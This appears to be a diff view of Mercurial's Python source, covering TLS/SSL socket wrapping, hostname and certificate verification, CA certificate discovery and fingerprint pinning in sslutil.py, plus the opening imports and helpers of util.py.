311 311 # SSLv2 and SSLv3 are broken. We ban them outright.
312 312 options = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
313 313
314 314 if protocol == 'tls1.0':
315 315 # Defaults above are to use TLS 1.0+
316 316 pass
317 317 elif protocol == 'tls1.1':
318 318 options |= ssl.OP_NO_TLSv1
319 319 elif protocol == 'tls1.2':
320 320 options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
321 321 else:
322 322 raise error.Abort(_('this should not happen'))
323 323
324 324 # Prevent CRIME.
325 325 # There is no guarantee this attribute is defined on the module.
326 326 options |= getattr(ssl, 'OP_NO_COMPRESSION', 0)
327 327
328 328 return ssl.PROTOCOL_SSLv23, options, protocol
329 329
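A hedged sketch of the mapping on a modern ssl module (on legacy stacks anything but 'tls1.0' aborts, per the branch above)::

    import ssl

    protocol, options, ui_value = protocolsettings('tls1.2')
    assert protocol == ssl.PROTOCOL_SSLv23  # negotiate, then forbid old versions
    assert options & ssl.OP_NO_TLSv1 and options & ssl.OP_NO_TLSv1_1
    assert ui_value == 'tls1.2'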
330 330 def wrapsocket(sock, keyfile, certfile, ui, serverhostname=None):
331 331 """Add SSL/TLS to a socket.
332 332
333 333 This is a glorified wrapper for ``ssl.wrap_socket()``. It makes sane
334 334 choices based on what security options are available.
335 335
336 336 In addition to the arguments supported by ``ssl.wrap_socket``, we allow
337 337 the following additional arguments:
338 338
339 339 * serverhostname - The expected hostname of the remote server. If the
340 340 server (and client) support SNI, this tells the server which certificate
341 341 to use.
342 342 """
343 343 if not serverhostname:
344 344 raise error.Abort(_('serverhostname argument is required'))
345 345
346 346 for f in (keyfile, certfile):
347 347 if f and not os.path.exists(f):
348 348 raise error.Abort(_('certificate file (%s) does not exist; '
349 349 'cannot connect to %s') % (f, serverhostname),
350 350 hint=_('restore missing file or fix references '
351 351 'in Mercurial config'))
352 352
353 353 settings = _hostsettings(ui, serverhostname)
354 354
355 355 # We can't use ssl.create_default_context() because it calls
356 356 # load_default_certs() unless CA arguments are passed to it. We want to
357 357 # have explicit control over CA loading because implicitly loading
358 358 # CAs may undermine the user's intent. For example, a user may define a CA
359 359 # bundle with a specific CA cert removed. If the system/default CA bundle
360 360 # is loaded and contains that removed CA, you've just undone the user's
361 361 # choice.
362 362 sslcontext = SSLContext(settings['protocol'])
363 363
364 364 # This is a no-op unless using modern ssl.
365 365 sslcontext.options |= settings['ctxoptions']
366 366
367 367 # This still works on our fake SSLContext.
368 368 sslcontext.verify_mode = settings['verifymode']
369 369
370 370 if settings['ciphers']:
371 371 try:
372 372 sslcontext.set_ciphers(settings['ciphers'])
373 373 except ssl.SSLError as e:
374 374 raise error.Abort(_('could not set ciphers: %s') % e.args[0],
375 375 hint=_('change cipher string (%s) in config') %
376 376 settings['ciphers'])
377 377
378 378 if certfile is not None:
379 379 def password():
380 380 f = keyfile or certfile
381 381 return ui.getpass(_('passphrase for %s: ') % f, '')
382 382 sslcontext.load_cert_chain(certfile, keyfile, password)
383 383
384 384 if settings['cafile'] is not None:
385 385 try:
386 386 sslcontext.load_verify_locations(cafile=settings['cafile'])
387 387 except ssl.SSLError as e:
388 388 if len(e.args) == 1: # pypy has different SSLError args
389 389 msg = e.args[0]
390 390 else:
391 391 msg = e.args[1]
392 392 raise error.Abort(_('error loading CA file %s: %s') % (
393 393 settings['cafile'], msg),
394 394 hint=_('file is empty or malformed?'))
395 395 caloaded = True
396 396 elif settings['allowloaddefaultcerts']:
397 397 # This is a no-op on old Python.
398 398 sslcontext.load_default_certs()
399 399 caloaded = True
400 400 else:
401 401 caloaded = False
402 402
403 403 try:
404 404 sslsocket = sslcontext.wrap_socket(sock, server_hostname=serverhostname)
405 405 except ssl.SSLError as e:
406 406 # If we're doing certificate verification and no CA certs are loaded,
407 407 # that is almost certainly the reason why verification failed. Provide
408 408 # a hint to the user.
409 409 # Only modern ssl module exposes SSLContext.get_ca_certs() so we can
410 410 # only show this warning if modern ssl is available.
411 411 # The exception handler is here to handle bugs around cert attributes:
412 412 # https://bugs.python.org/issue20916#msg213479. (See issue5313.)
413 413 # When the main 20916 bug occurs, 'sslcontext.get_ca_certs()' is a
414 414 # non-empty list, but the following conditional is otherwise True.
415 415 try:
416 416 if (caloaded and settings['verifymode'] == ssl.CERT_REQUIRED and
417 417 modernssl and not sslcontext.get_ca_certs()):
418 418 ui.warn(_('(an attempt was made to load CA certificates but '
419 419 'none were loaded; see '
420 420 'https://mercurial-scm.org/wiki/SecureConnections '
421 421 'for how to configure Mercurial to avoid this '
422 422 'error)\n'))
423 423 except ssl.SSLError:
424 424 pass
425 425 # Try to print more helpful error messages for known failures.
426 426 if util.safehasattr(e, 'reason'):
427 427 # This error occurs when the client and server don't share a
428 428 # common/supported SSL/TLS protocol. We've disabled SSLv2 and SSLv3
429 429 # outright. Hopefully the reason for this error is that we require
430 430 # TLS 1.1+ and the server only supports TLS 1.0. Whatever the
431 431 # reason, try to emit an actionable warning.
432 432 if e.reason == 'UNSUPPORTED_PROTOCOL':
433 433 # We attempted TLS 1.0+.
434 434 if settings['protocolui'] == 'tls1.0':
435 435 # We support more than just TLS 1.0+. If this happens,
436 436 # the likely scenario is either the client or the server
437 437 # is really old. (e.g. server doesn't support TLS 1.0+ or
438 438 # client doesn't support modern TLS versions introduced
439 439 # several years before this comment was written).
440 440 if supportedprotocols != {'tls1.0'}:
441 441 ui.warn(_(
442 442 '(could not communicate with %s using security '
443 443 'protocols %s; if you are using a modern Mercurial '
444 444 'version, consider contacting the operator of this '
445 445 'server; see '
446 446 'https://mercurial-scm.org/wiki/SecureConnections '
447 447 'for more info)\n') % (
448 448 serverhostname,
449 449 ', '.join(sorted(supportedprotocols))))
450 450 else:
451 451 ui.warn(_(
452 452 '(could not communicate with %s using TLS 1.0; the '
453 453 'likely cause of this is the server no longer '
454 454 'supports TLS 1.0 because it has known security '
455 455 'vulnerabilities; see '
456 456 'https://mercurial-scm.org/wiki/SecureConnections '
457 457 'for more info)\n') % serverhostname)
458 458 else:
459 459 # We attempted TLS 1.1+. We can only get here if the client
460 460 # supports the configured protocol. So the likely reason is
461 461 # the client wants better security than the server can
462 462 # offer.
463 463 ui.warn(_(
464 464 '(could not negotiate a common security protocol (%s+) '
465 465 'with %s; the likely cause is Mercurial is configured '
466 466 'to be more secure than the server can support)\n') % (
467 467 settings['protocolui'], serverhostname))
468 468 ui.warn(_('(consider contacting the operator of this '
469 469 'server and ask them to support modern TLS '
470 470 'protocol versions; or, set '
471 471 'hostsecurity.%s:minimumprotocol=tls1.0 to allow '
472 472 'use of legacy, less secure protocols when '
473 473 'communicating with this server)\n') %
474 474 serverhostname)
475 475 ui.warn(_(
476 476 '(see https://mercurial-scm.org/wiki/SecureConnections '
477 477 'for more info)\n'))
478 478
479 479 elif (e.reason == 'CERTIFICATE_VERIFY_FAILED' and
480 480 pycompat.iswindows):
481 481
482 482 ui.warn(_('(the full certificate chain may not be available '
483 483 'locally; see "hg help debugssl")\n'))
484 484 raise
485 485
486 486 # check if wrap_socket failed silently because socket had been
487 487 # closed
488 488 # - see http://bugs.python.org/issue13721
489 489 if not sslsocket.cipher():
490 490 raise error.Abort(_('ssl connection failed'))
491 491
492 492 sslsocket._hgstate = {
493 493 'caloaded': caloaded,
494 494 'hostname': serverhostname,
495 495 'settings': settings,
496 496 'ui': ui,
497 497 }
498 498
499 499 return sslsocket
500 500
501 501 def wrapserversocket(sock, ui, certfile=None, keyfile=None, cafile=None,
502 502 requireclientcert=False):
503 503 """Wrap a socket for use by servers.
504 504
505 505 ``certfile`` and ``keyfile`` specify the files containing the certificate's
506 506 public and private keys, respectively. Both keys can be defined in the same
507 507 file via ``certfile`` (the private key must come first in the file).
508 508
509 509 ``cafile`` defines the path to certificate authorities.
510 510
511 511 ``requireclientcert`` specifies whether to require client certificates.
512 512
513 513 Typically ``cafile`` is only defined if ``requireclientcert`` is true.
514 514 """
515 515 # This function is not used much by core Mercurial, so the error messaging
516 516 # doesn't have to be as detailed as for wrapsocket().
517 517 for f in (certfile, keyfile, cafile):
518 518 if f and not os.path.exists(f):
519 519 raise error.Abort(_('referenced certificate file (%s) does not '
520 520 'exist') % f)
521 521
522 522 protocol, options, _protocolui = protocolsettings('tls1.0')
523 523
524 524 # This config option is intended for use in tests only. It is a giant
525 525 # footgun to kill security. Don't define it.
526 526 exactprotocol = ui.config('devel', 'serverexactprotocol')
527 527 if exactprotocol == 'tls1.0':
528 528 protocol = ssl.PROTOCOL_TLSv1
529 529 elif exactprotocol == 'tls1.1':
530 530 if 'tls1.1' not in supportedprotocols:
531 531 raise error.Abort(_('TLS 1.1 not supported by this Python'))
532 532 protocol = ssl.PROTOCOL_TLSv1_1
533 533 elif exactprotocol == 'tls1.2':
534 534 if 'tls1.2' not in supportedprotocols:
535 535 raise error.Abort(_('TLS 1.2 not supported by this Python'))
536 536 protocol = ssl.PROTOCOL_TLSv1_2
537 537 elif exactprotocol:
538 538 raise error.Abort(_('invalid value for serverexactprotocol: %s') %
539 539 exactprotocol)
540 540
541 541 if modernssl:
542 542 # We /could/ use create_default_context() here since it doesn't load
543 543 # CAs when configured for client auth. However, it is hard-coded to
544 544 # use ssl.PROTOCOL_SSLv23 which may not be appropriate here.
545 545 sslcontext = SSLContext(protocol)
546 546 sslcontext.options |= options
547 547
548 548 # Improve forward secrecy.
549 549 sslcontext.options |= getattr(ssl, 'OP_SINGLE_DH_USE', 0)
550 550 sslcontext.options |= getattr(ssl, 'OP_SINGLE_ECDH_USE', 0)
551 551
552 552 # Use the list of more secure ciphers if found in the ssl module.
553 553 if util.safehasattr(ssl, '_RESTRICTED_SERVER_CIPHERS'):
554 554 sslcontext.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0)
555 555 sslcontext.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)
556 556 else:
557 557 sslcontext = SSLContext(ssl.PROTOCOL_TLSv1)
558 558
559 559 if requireclientcert:
560 560 sslcontext.verify_mode = ssl.CERT_REQUIRED
561 561 else:
562 562 sslcontext.verify_mode = ssl.CERT_NONE
563 563
564 564 if certfile or keyfile:
565 565 sslcontext.load_cert_chain(certfile=certfile, keyfile=keyfile)
566 566
567 567 if cafile:
568 568 sslcontext.load_verify_locations(cafile=cafile)
569 569
570 570 return sslcontext.wrap_socket(sock, server_side=True)
571 571
572 572 class wildcarderror(Exception):
573 573 """Represents an error parsing wildcards in DNS name."""
574 574
575 575 def _dnsnamematch(dn, hostname, maxwildcards=1):
576 576 """Match DNS names according RFC 6125 section 6.4.3.
577 577
578 578 This code is effectively copied from CPython's ssl._dnsname_match.
579 579
580 580 Returns a bool indicating whether the expected hostname matches
581 581 the value in ``dn``.
582 582 """
583 583 pats = []
584 584 if not dn:
585 585 return False
586 586
587 587 pieces = dn.split(r'.')
588 588 leftmost = pieces[0]
589 589 remainder = pieces[1:]
590 590 wildcards = leftmost.count('*')
591 591 if wildcards > maxwildcards:
592 592 raise wildcarderror(
593 593 _('too many wildcards in certificate DNS name: %s') % dn)
594 594
595 595 # speed up common case w/o wildcards
596 596 if not wildcards:
597 597 return dn.lower() == hostname.lower()
598 598
599 599 # RFC 6125, section 6.4.3, subitem 1.
600 600 # The client SHOULD NOT attempt to match a presented identifier in which
601 601 # the wildcard character comprises a label other than the left-most label.
602 602 if leftmost == '*':
603 603 # When '*' is a fragment by itself, it matches a non-empty dotless
604 604 # fragment.
605 605 pats.append('[^.]+')
606 606 elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
607 607 # RFC 6125, section 6.4.3, subitem 3.
608 608 # The client SHOULD NOT attempt to match a presented identifier
609 609 # where the wildcard character is embedded within an A-label or
610 610 # U-label of an internationalized domain name.
611 611 pats.append(re.escape(leftmost))
612 612 else:
613 613 # Otherwise, '*' matches any dotless string, e.g. www*
614 614 pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
615 615
616 616 # add the remaining fragments, ignore any wildcards
617 617 for frag in remainder:
618 618 pats.append(re.escape(frag))
619 619
620 620 pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
621 621 return pat.match(hostname) is not None
622 622
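Some illustrative matches (hypothetical names) following the RFC 6125 rules implemented above::

    _dnsnamematch('*.example.com', 'www.example.com')     # True
    _dnsnamematch('*.example.com', 'a.b.example.com')     # False: '*' spans one label
    _dnsnamematch('www*.example.com', 'www1.example.com') # True: partial wildcard
    _dnsnamematch('example.com', 'EXAMPLE.COM')           # True: case-insensitive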
623 623 def _verifycert(cert, hostname):
624 624 '''Verify that cert (in socket.getpeercert() format) matches hostname.
625 625 CRLs are not handled.
626 626
627 627 Returns error message if any problems are found and None on success.
628 628 '''
629 629 if not cert:
630 630 return _('no certificate received')
631 631
632 632 dnsnames = []
633 633 san = cert.get('subjectAltName', [])
634 634 for key, value in san:
635 635 if key == 'DNS':
636 636 try:
637 637 if _dnsnamematch(value, hostname):
638 638 return
639 639 except wildcarderror as e:
640 640 return e.args[0]
641 641
642 642 dnsnames.append(value)
643 643
644 644 if not dnsnames:
645 645 # The subject is only checked when there is no DNS in subjectAltName.
646 646 for sub in cert.get('subject', []):
647 647 for key, value in sub:
648 648 # According to RFC 2818 the most specific Common Name must
649 649 # be used.
650 650 if key == 'commonName':
651 651 # 'subject' entries are unicode.
652 652 try:
653 653 value = value.encode('ascii')
654 654 except UnicodeEncodeError:
655 655 return _('IDN in certificate not supported')
656 656
657 657 try:
658 658 if _dnsnamematch(value, hostname):
659 659 return
660 660 except wildcarderror as e:
661 661 return e.args[0]
662 662
663 663 dnsnames.append(value)
664 664
665 665 if len(dnsnames) > 1:
666 666 return _('certificate is for %s') % ', '.join(dnsnames)
667 667 elif len(dnsnames) == 1:
668 668 return _('certificate is for %s') % dnsnames[0]
669 669 else:
670 670 return _('no commonName or subjectAltName found in certificate')
671 671
672 672 def _plainapplepython():
673 673 """return true if this seems to be a pure Apple Python that
674 674 * is unfrozen and presumably has the whole mercurial module in the file
675 675 system
676 676 * presumably is an Apple Python that uses Apple OpenSSL which has patches
677 677 for using system certificate store CAs in addition to the provided
678 678 cacerts file
679 679 """
680 if (pycompat.sysplatform != 'darwin' or
681 util.mainfrozen() or not pycompat.sysexecutable):
680 if (not pycompat.isdarwin or util.mainfrozen() or
681 not pycompat.sysexecutable):
682 682 return False
683 683 exe = os.path.realpath(pycompat.sysexecutable).lower()
684 684 return (exe.startswith('/usr/bin/python') or
685 685 exe.startswith('/system/library/frameworks/python.framework/'))
686 686
687 687 _systemcacertpaths = [
688 688 # RHEL, CentOS, and Fedora
689 689 '/etc/pki/tls/certs/ca-bundle.trust.crt',
690 690 # Debian, Ubuntu, Gentoo
691 691 '/etc/ssl/certs/ca-certificates.crt',
692 692 ]
693 693
694 694 def _defaultcacerts(ui):
695 695 """return path to default CA certificates or None.
696 696
697 697 It is assumed this function is called when the returned certificates
698 698 file will actually be used to validate connections. Therefore this
699 699 function may print warnings or debug messages assuming this usage.
700 700
701 701 We don't print a message when the Python is able to load default
702 702 CA certs because this scenario is detected at socket connect time.
703 703 """
704 704 # The "certifi" Python package provides certificates. If it is installed
705 705 # and usable, assume the user intends it to be used and use it.
706 706 try:
707 707 import certifi
708 708 certs = certifi.where()
709 709 if os.path.exists(certs):
710 710 ui.debug('using ca certificates from certifi\n')
711 711 return certs
712 712 except (ImportError, AttributeError):
713 713 pass
714 714
715 715 # On Windows, only the modern ssl module is capable of loading the system
716 716 # CA certificates. If we're not capable of doing that, emit a warning
717 717 # because we'll get a certificate verification error later and the lack
718 718 # of loaded CA certificates will be the reason why.
719 719 # Assertion: this code is only called if certificates are being verified.
720 720 if pycompat.iswindows:
721 721 if not _canloaddefaultcerts:
722 722 ui.warn(_('(unable to load Windows CA certificates; see '
723 723 'https://mercurial-scm.org/wiki/SecureConnections for '
724 724 'how to configure Mercurial to avoid this message)\n'))
725 725
726 726 return None
727 727
728 728 # Apple's OpenSSL has patches that allow a specially constructed certificate
729 729 # to load the system CA store. If we're running on Apple Python, use this
730 730 # trick.
731 731 if _plainapplepython():
732 732 dummycert = os.path.join(
733 733 os.path.dirname(pycompat.fsencode(__file__)), 'dummycert.pem')
734 734 if os.path.exists(dummycert):
735 735 return dummycert
736 736
737 737 # The Apple OpenSSL trick isn't available to us. If Python isn't able to
738 738 # load system certs, we're out of luck.
739 if pycompat.sysplatform == 'darwin':
739 if pycompat.isdarwin:
740 740 # FUTURE Consider looking for Homebrew or MacPorts installed certs
741 741 # files. Also consider exporting the keychain certs to a file during
742 742 # Mercurial install.
743 743 if not _canloaddefaultcerts:
744 744 ui.warn(_('(unable to load CA certificates; see '
745 745 'https://mercurial-scm.org/wiki/SecureConnections for '
746 746 'how to configure Mercurial to avoid this message)\n'))
747 747 return None
748 748
749 749 # / is writable on Windows. Out of an abundance of caution make sure
750 750 # we're not on Windows because paths from _systemcacerts could be installed
751 751 # by non-admin users.
752 752 assert not pycompat.iswindows
753 753
754 754 # Try to find CA certificates in well-known locations. We print a warning
755 755 # when using a found file because we don't want too much silent magic
756 756 # for security settings. The expectation is that proper Mercurial
757 757 # installs will have the CA certs path defined at install time and the
758 758 # installer/packager will make an appropriate decision on the user's
759 759 # behalf. We only get here and perform this setting as a feature of
760 760 # last resort.
761 761 if not _canloaddefaultcerts:
762 762 for path in _systemcacertpaths:
763 763 if os.path.isfile(path):
764 764 ui.warn(_('(using CA certificates from %s; if you see this '
765 765 'message, your Mercurial install is not properly '
766 766 'configured; see '
767 767 'https://mercurial-scm.org/wiki/SecureConnections '
768 768 'for how to configure Mercurial to avoid this '
769 769 'message)\n') % path)
770 770 return path
771 771
772 772 ui.warn(_('(unable to load CA certificates; see '
773 773 'https://mercurial-scm.org/wiki/SecureConnections for '
774 774 'how to configure Mercurial to avoid this message)\n'))
775 775
776 776 return None
777 777
778 778 def validatesocket(sock):
779 779 """Validate a socket meets security requirements.
780 780
781 781 The passed socket must have been created with ``wrapsocket()``.
782 782 """
783 783 host = sock._hgstate['hostname']
784 784 ui = sock._hgstate['ui']
785 785 settings = sock._hgstate['settings']
786 786
787 787 try:
788 788 peercert = sock.getpeercert(True)
789 789 peercert2 = sock.getpeercert()
790 790 except AttributeError:
791 791 raise error.Abort(_('%s ssl connection error') % host)
792 792
793 793 if not peercert:
794 794 raise error.Abort(_('%s certificate error: '
795 795 'no certificate received') % host)
796 796
797 797 if settings['disablecertverification']:
798 798 # We don't print the certificate fingerprint because it shouldn't
799 799 # be necessary: if the user requested certificate verification be
800 800 # disabled, they presumably already saw a message about the inability
801 801 # to verify the certificate and this message would have printed the
802 802 # fingerprint. So printing the fingerprint here adds little to no
803 803 # value.
804 804 ui.warn(_('warning: connection security to %s is disabled per current '
805 805 'settings; communication is susceptible to eavesdropping '
806 806 'and tampering\n') % host)
807 807 return
808 808
809 809 # If a certificate fingerprint is pinned, use it and only it to
810 810 # validate the remote cert.
811 811 peerfingerprints = {
812 812 'sha1': hashlib.sha1(peercert).hexdigest(),
813 813 'sha256': hashlib.sha256(peercert).hexdigest(),
814 814 'sha512': hashlib.sha512(peercert).hexdigest(),
815 815 }
816 816
817 817 def fmtfingerprint(s):
818 818 return ':'.join([s[x:x + 2] for x in range(0, len(s), 2)])
819 819
820 820 nicefingerprint = 'sha256:%s' % fmtfingerprint(peerfingerprints['sha256'])
821 821
822 822 if settings['certfingerprints']:
823 823 for hash, fingerprint in settings['certfingerprints']:
824 824 if peerfingerprints[hash].lower() == fingerprint:
825 825 ui.debug('%s certificate matched fingerprint %s:%s\n' %
826 826 (host, hash, fmtfingerprint(fingerprint)))
827 827 if settings['legacyfingerprint']:
828 828 ui.warn(_('(SHA-1 fingerprint for %s found in legacy '
829 829 '[hostfingerprints] section; '
830 830 'if you trust this fingerprint, remove the old '
831 831 'SHA-1 fingerprint from [hostfingerprints] and '
832 832 'add the following entry to the new '
833 833 '[hostsecurity] section: %s:fingerprints=%s)\n') %
834 834 (host, host, nicefingerprint))
835 835 return
836 836
837 837 # Pinned fingerprint didn't match. This is a fatal error.
838 838 if settings['legacyfingerprint']:
839 839 section = 'hostfingerprint'
840 840 nice = fmtfingerprint(peerfingerprints['sha1'])
841 841 else:
842 842 section = 'hostsecurity'
843 843 nice = '%s:%s' % (hash, fmtfingerprint(peerfingerprints[hash]))
844 844 raise error.Abort(_('certificate for %s has unexpected '
845 845 'fingerprint %s') % (host, nice),
846 846 hint=_('check %s configuration') % section)
847 847
848 848 # Security is enabled but no CAs are loaded. We can't establish trust
849 849 # for the cert so abort.
850 850 if not sock._hgstate['caloaded']:
851 851 raise error.Abort(
852 852 _('unable to verify security of %s (no loaded CA certificates); '
853 853 'refusing to connect') % host,
854 854 hint=_('see https://mercurial-scm.org/wiki/SecureConnections for '
855 855 'how to configure Mercurial to avoid this error or set '
856 856 'hostsecurity.%s:fingerprints=%s to trust this server') %
857 857 (host, nicefingerprint))
858 858
859 859 msg = _verifycert(peercert2, host)
860 860 if msg:
861 861 raise error.Abort(_('%s certificate error: %s') % (host, msg),
862 862 hint=_('set hostsecurity.%s:certfingerprints=%s '
863 863 'config setting or use --insecure to connect '
864 864 'insecurely') %
865 865 (host, nicefingerprint))
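# A minimal illustration (not part of this module) of the pinning syntax
# that validatesocket() enforces; the host and digest below are made-up
# placeholder values:
#
#   [hostsecurity]
#   example.com:fingerprints = sha256:20:62:11:...
#
# A matching pinned fingerprint bypasses CA verification entirely; a
# mismatch aborts with a hint naming the config section that set the pin.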
@@ -1,3861 +1,3861 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 empty = pycompat.empty
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 queue = pycompat.queue
69 69 socketserver = pycompat.socketserver
70 70 stderr = pycompat.stderr
71 71 stdin = pycompat.stdin
72 72 stdout = pycompat.stdout
73 73 stringio = pycompat.stringio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 def isatty(fp):
84 84 try:
85 85 return fp.isatty()
86 86 except AttributeError:
87 87 return False
88 88
89 89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 91 # buffering
92 92 if isatty(stdout):
93 93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 stdout = platform.winstdout(stdout)
98 98 else:
99 99 from . import posix as platform
100 100
101 101 _ = i18n._
102 102
103 103 bindunixsocket = platform.bindunixsocket
104 104 cachestat = platform.cachestat
105 105 checkexec = platform.checkexec
106 106 checklink = platform.checklink
107 107 copymode = platform.copymode
108 108 executablepath = platform.executablepath
109 109 expandglobs = platform.expandglobs
110 110 explainexit = platform.explainexit
111 111 findexe = platform.findexe
112 112 gethgcmd = platform.gethgcmd
113 113 getuser = platform.getuser
114 114 getpid = os.getpid
115 115 groupmembers = platform.groupmembers
116 116 groupname = platform.groupname
117 117 hidewindow = platform.hidewindow
118 118 isexec = platform.isexec
119 119 isowner = platform.isowner
120 120 listdir = osutil.listdir
121 121 localpath = platform.localpath
122 122 lookupreg = platform.lookupreg
123 123 makedir = platform.makedir
124 124 nlinks = platform.nlinks
125 125 normpath = platform.normpath
126 126 normcase = platform.normcase
127 127 normcasespec = platform.normcasespec
128 128 normcasefallback = platform.normcasefallback
129 129 openhardlinks = platform.openhardlinks
130 130 oslink = platform.oslink
131 131 parsepatchoutput = platform.parsepatchoutput
132 132 pconvert = platform.pconvert
133 133 poll = platform.poll
134 134 popen = platform.popen
135 135 posixfile = platform.posixfile
136 136 quotecommand = platform.quotecommand
137 137 readpipe = platform.readpipe
138 138 rename = platform.rename
139 139 removedirs = platform.removedirs
140 140 samedevice = platform.samedevice
141 141 samefile = platform.samefile
142 142 samestat = platform.samestat
143 143 setbinary = platform.setbinary
144 144 setflags = platform.setflags
145 145 setsignalhandler = platform.setsignalhandler
146 146 shellquote = platform.shellquote
147 147 spawndetached = platform.spawndetached
148 148 split = platform.split
149 149 sshargs = platform.sshargs
150 150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 151 statisexec = platform.statisexec
152 152 statislink = platform.statislink
153 153 testpid = platform.testpid
154 154 umask = platform.umask
155 155 unlink = platform.unlink
156 156 username = platform.username
157 157
158 158 try:
159 159 recvfds = osutil.recvfds
160 160 except AttributeError:
161 161 pass
162 162 try:
163 163 setprocname = osutil.setprocname
164 164 except AttributeError:
165 165 pass
166 166
167 167 # Python compatibility
168 168
169 169 _notset = object()
170 170
171 171 # disable Python's problematic floating point timestamps (issue4836)
172 172 # (Python hypocritically says you shouldn't change this behavior in
173 173 # libraries, and sure enough Mercurial is not a library.)
174 174 os.stat_float_times(False)
175 175
176 176 def safehasattr(thing, attr):
177 177 return getattr(thing, attr, _notset) is not _notset
178 178
179 179 def bytesinput(fin, fout, *args, **kwargs):
180 180 sin, sout = sys.stdin, sys.stdout
181 181 try:
182 182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 184 finally:
185 185 sys.stdin, sys.stdout = sin, sout
186 186
187 187 def bitsfrom(container):
188 188 bits = 0
189 189 for bit in container:
190 190 bits |= bit
191 191 return bits
192 192
193 193 # python 2.6 still has deprecation warnings enabled by default. We do not want
194 194 # to display anything to a standard user, so detect if we are running tests and
195 195 # only use python deprecation warnings in that case.
196 196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 197 if _dowarn:
198 198 # explicitly unfilter our warning for python 2.7
199 199 #
200 200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 201 # However, module names set through PYTHONWARNINGS were matched exactly, so
202 202 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
203 203 # makes the whole PYTHONWARNINGS thing useless for our use case.
204 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue a Python-native deprecation warning
210 210
211 211 This is a no-op outside of tests; use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 215 " update your code.)") % version
216 216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 217
218 218 DIGESTS = {
219 219 'md5': hashlib.md5,
220 220 'sha1': hashlib.sha1,
221 221 'sha512': hashlib.sha512,
222 222 }
223 223 # List of digest types from strongest to weakest
224 224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 225
226 226 for k in DIGESTS_BY_STRENGTH:
227 227 assert k in DIGESTS
228 228
229 229 class digester(object):
230 230 """helper to compute digests.
231 231
232 232 This helper can be used to compute one or more digests given their name.
233 233
234 234 >>> d = digester([b'md5', b'sha1'])
235 235 >>> d.update(b'foo')
236 236 >>> [k for k in sorted(d)]
237 237 ['md5', 'sha1']
238 238 >>> d[b'md5']
239 239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 240 >>> d[b'sha1']
241 241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 242 >>> digester.preferred([b'md5', b'sha1'])
243 243 'sha1'
244 244 """
245 245
246 246 def __init__(self, digests, s=''):
247 247 self._hashes = {}
248 248 for k in digests:
249 249 if k not in DIGESTS:
250 250 raise Abort(_('unknown digest type: %s') % k)
251 251 self._hashes[k] = DIGESTS[k]()
252 252 if s:
253 253 self.update(s)
254 254
255 255 def update(self, data):
256 256 for h in self._hashes.values():
257 257 h.update(data)
258 258
259 259 def __getitem__(self, key):
260 260 if key not in DIGESTS:
261 261 raise Abort(_('unknown digest type: %s') % key)
262 262 return self._hashes[key].hexdigest()
263 263
264 264 def __iter__(self):
265 265 return iter(self._hashes)
266 266
267 267 @staticmethod
268 268 def preferred(supported):
269 269 """returns the strongest digest type in both supported and DIGESTS."""
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
